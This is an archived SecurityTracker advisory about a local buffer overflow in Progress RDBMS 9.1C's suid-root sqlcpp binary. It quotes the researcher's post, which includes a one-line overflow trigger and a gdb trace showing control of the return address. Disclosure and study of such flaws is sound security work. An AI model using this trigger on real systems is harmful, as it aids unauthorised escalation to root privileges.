SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Database)  >   Progress Database Vendors:   Progress Software Corporation
Progress Database Buffer Overflow May Let Local Users Gain Root Privileges
SecurityTracker Alert ID:  1003890
SecurityTracker URL:  http://securitytracker.com/id/1003890
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 25 2002
Impact:   Execution of arbitrary code via local system, Root access via local system

Version(s): 9.1C
Description:   Another buffer overflow vulnerability was reported in the Progress RDBMS. A local user may be able to execute arbitrary code on the system to gain root privileges.

A buffer overflow vulnerability has been reported in the sqlcpp binary, which is configured with set user id (suid) root privileges. A local user can reportedly trigger the overflow with the following type of command:

/usr/dlc/bin/./sqlcpp `perl -e 'print "A" x 9000'`

It is reported that it may be possible for the local user to cause arbitrary code to be executed via this buffer overflow.

Impact:   A local user may be able to execute arbitrary code on the system with root privileges to gain root access on the system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.progress.com/v9/datasheets/rdbms.htm (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (AIX), UNIX (DGUX), UNIX (HP/UX), UNIX (Open UNIX-SCO), UNIX (Solaris - SunOS), UNIX (Tru64)

Message History:   None.


 Source Message Contents

Subject:  Progress Software suid overflows again.


Yet another b0f in progress software due to p_stcopy()

Progress Software corp. http://www.progress.com STILL can't seem to 
validate user input... this is in their latest patch level for Progress 
9.1C

91C09.tar.Z

[root@localhost bin]# cat ../version
echo PROGRESS PATCH Version 9.1C09 as of February 26, 2002

[root@localhost bin]# ls -al sqlcpp
-rwsrwxr-x    1 root     root      2222278 Feb 26 08:17 sqlcpp

[root@localhost bin]# gdb -q ./sqlcpp
(gdb) r  `perl -e 'print "A" x 9000'`
Starting program: /usr/dlc/bin/./sqlcpp `perl -e 'print "A" x 9000'`

Program received signal SIGSEGV, Segmentation fault.
0x081f5670 in p_stcopy () at eval.c:41
41      eval.c: No such file or directory.
        in eval.c
(gdb) bt
#0  0x081f5670 in p_stcopy () at eval.c:41
#1  0x080b03a0 in sqlppgdst () at eval.c:41
#2  0x41414141 in ?? ()
Cannot access memory at address 0x41414141

Progress was NOT notified due to the number of times I have tryed to 
tell them how to fix their software.... I have ran out of fingers and 
toes to count Progress holes on.

-KF


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC